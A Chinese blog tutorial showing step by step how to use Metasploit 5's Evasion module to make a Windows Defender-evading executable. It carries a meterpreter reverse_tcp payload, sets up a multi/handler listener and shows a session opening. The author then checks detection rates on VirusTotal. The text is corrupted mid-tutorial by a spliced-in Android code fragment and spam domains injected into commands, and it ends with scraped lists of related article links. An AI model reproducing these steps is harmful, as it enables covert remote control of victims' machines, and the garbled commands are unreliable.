简介
  
  几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试
  
  操作
  
  首先打开metasploit
  
  msfconsole
  
  你会看到下面这个界面
  
  ➜ ~ msfconsole
  
  This copy of metasploit-framework is more than two weeks old.
  
  Consider running 'msfupdate' to update to the latest version.
  
  .:okOOOkdc' 'cdkOOOko:.
  
  .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
  
  :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
  
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  
  cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
  
  oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
  
  lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
  
  ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
  
  .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
  
  ,kOl'M.OOOOOOOOOOOOO.M'dOk,
  
  :kk;.OOOOOOOOOOOOO.;Ok:
  
  ;kOOOOOOOOOOOOOOOk:
  
  ,xOOOOOOOOOOOx,
  
  .lOOOOOOOl.
  
  ,dOd,
  
  .
  
  =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
  
  + -- --=[ 1851 exploits - 1046 auxiliary - 321 post ]
  
  + -- --=[ 541 payloads - 44 encoders - 10 nops ]
  
  + -- --=[ 2 evasion ]
  
  + -- --=[ ** This is Metasploit 5 development branch ** ]
  
  之后使用evasion模块,首先看看有什么evasion模块
  
  msf5 > show evasion
  
  evasion
  
  =======
  
  Name Disclosure Date Rank Check Description
  
  ---- --------------- ---- ----- -----------
  
  windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable
  
  windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA
  
  使用windows/windows_defender_exe这个模块
  
  use windows/windows_defender_exe
  
  查看要配置的参数
  
  show options
  
  msf5 evasion(windows/windows_defender_exe) > show options
  
  Module options (evasion/windows/windows_defender_exe):
  
  Name Current Setting Required Description
  
  ---- --------------- -------- -----------
  
  FILENAME oDlIipoP.exe yes Filename for the evasive file (default: random)
  
  Evasion target:
  
  Id Name
  
  @Override
  
  public void onReceive(Context content, Intent intent)
  
  {
  
  String action=intent.getAction(www.dfgjpt.com);
  
  if (actionName.equals(action))
  
  {
  
  String msg=intent.getStringExtra("content");
  
  Toast.makeText(getApplicationContext(www.yongshi123.cn),msg,Toast.LENGTH_SHORT).show();
  
  http://dasheng178.com/#portal/list.html
  
  Intent inten = new Intent("android.intent.action.MAIN");
  
  inten.setComponent(new ComponentName(www.hengtongyoule.com getApplicationContext().getPackageName(), Main2Activity.class.getName()));
  
  intent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT
  
  | Intent.FLAG_ACTIVITY_NEW_TASK
  
  | Intent.FLAG_ACTIVITY_RESET_TASK_IF_NEEDED);
  
  getApplicationContext().startActivity(inten);
  
  }
  
  0 Microsoft Windows
  
  就一个文件名参数可以配置
  
  set FILENAME bboysoul.exe
  
  之后使用reverse_www.dasheng178.com tcp payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置端口和ip
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  生成木马文件
  
  exploit
  
  之后打开一个监听端口
  
  use multi/handler
  
  设置payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置主机和端口
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  执行
  
  exploit
  
  接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了
  
  msf5 exploit(multi/handler)www.ysgptvip.com > exploit
  
  [*] Started reverse TCP handler on 10.10.10.186:4444
  
  ^@[*] Sending stage (179779 bytes) to 10.10.10.167
  
  [*] Meterpreter session 1 opened www.meiwanyule.cn/ (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800
  
  上面都是常规操作,之后我们扫描病毒
  
  打开
  
  www.virustotal.com
  
  放入文件扫描
  
  只有33个病毒引擎扫描出来了,说明还可以

使用metasploit中Evasion模块的更多相关文章

  1. Metasploit渗透测试模块(一)

    1.Metasploit模块加载 初始化界面,成功要加载数据库 查看 Metasploit中已近存在的漏洞模块使用 show payloads

  2. metasploit 中的DB

    渗透测试任务中,主机/服务/漏洞等信息如果手动维护,会带来巨大的工作量. 在metasploit中,这部分工作已经被封装的非常好,每次调用内部模块执行的任务结果都会自动存入DB.通过简单的指令即可以方 ...

  3. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  4. Metasploit自动攻击模块

    Metasploit自动攻击模块 Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit ...

  5. 了解Metasploit中的Payloads(有效载荷)

    什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...

  6. 【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控

    文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了 ...

  7. 隐藏进程中的模块绕过IceSword的检测

    标 题: [原创] 隐藏进程中的模块绕过IceSword的检测 作 者: xPLK 时 间: 2008-06-19,17:59:11 链 接: http://bbs.pediy.com/showthr ...

  8. 浅析JS中的模块规范(CommonJS,AMD,CMD)////////////////////////zzzzzz

    浅析JS中的模块规范(CommonJS,AMD,CMD)   如果你听过js模块化这个东西,那么你就应该听过或CommonJS或AMD甚至是CMD这些规范咯,我也听过,但之前也真的是听听而已.     ...

  9. 解决centos7中python-pip模块不存在的问题

    centos 7中python-pip模块不存在,是因为像centos这类衍生的发行版,源跟新滞后,或者不存在.即使使用yum去search python-pip也找不到软件包. 为了使用安装滞后或源 ...

随机推荐

  1. zookeepeer集群搭建

    一.预备工作 1.zookeepeer需要安装JDK,至于版本,大家可以去官网查询一下.这里我安装的是JDK8. 2.需要开放zookeepeer用到的端口,默认端口2181.2888.3888,至于 ...

  2. Python基础(函数,函数的定义,函数的调用,函数的参数,递归函数)

    1.函数 我们知道圆的面积计算公式为: S = πr2 当我们知道半径r的值时,就可以根据公式计算出面积.假设我们需要计算3个不同大小的圆的面积: r1 = 12.34 r2 = 9.08 r3 = ...

  3. Linux性能评测工具之一:gprof篇

    这些天自己试着对项目作一些压力测试和性能优化,也对用过的测试工具作一些总结,并把相关的资料作一个汇总,以便以后信手拈来! 1 简介 改进应用程序的性能是一项非常耗时耗力的工作,但是究竟程序中是哪些函数 ...

  4. MGR主从不一致问题排查与修复

    运行环境 linux:CentOS release 6.8 (Final) kernel:2.6.32-642.6.2.el6.x86_64 mysql Server version: 5.7.21- ...

  5. 以英雄联盟的方式建模,谈对依赖注入(DI)的理解以及Autofac的用法(一)

    一.前言 近期在探索分层架构和架构设计,选择了领域驱动作为5年.Net开发后的新的方向,不可避免的接触了IoC/DI方面的技术.目前通过反射或其他方法都已实现,但只知其一,并没有考虑为什么要这么做,同 ...

  6. 因写太多 BUG!程序员遭公司颁奖羞辱,做的一个比一个绝​

    刚入职的程序员新人,办公桌上,基本上也就一电脑.一键盘.一鼠标,再配个被杯子.然而混迹职场多年的猿老们,办公桌上都有一些彰显身份地位的“好东西”. 这张图两点颇多,最显眼的,是办公桌上那个黄黄的东西, ...

  7. Vue2.0 搭配 axios

    1.安装axios $ npm install axios 2.Demo (1)Get // 为给定 ID 的 user 创建请求 axios.get('/user?ID=12345') .then( ...

  8. HTTP协议基础与web服务的重定向,跳转以及请求转发

    JavaWeb中,HttpServletRequest与HttpServletResponse几乎是处理各种请求与操作必备的参数,与原始的ServletRequest/ServletResponse相 ...

  9. jenkins 上命令各种找不到问题

    代码: 兵马未动,粮草先行 作者: 传说中的汽水枪 如有错误,请留言指正,欢迎一起探讨. 转载请注明出处.   在使用jenkins的时候,会使用一些命令行,有的时候明明在电脑的命令行(终端)可以执行 ...

  10. github个人作业

    信息学院本科生课程设计 题目                    文件加密和解密 课程名称 面向对象程序设计课程设计 课程编号 X031749 所在专业 计算机科学与技术 所在班级 计科高职13-3 ...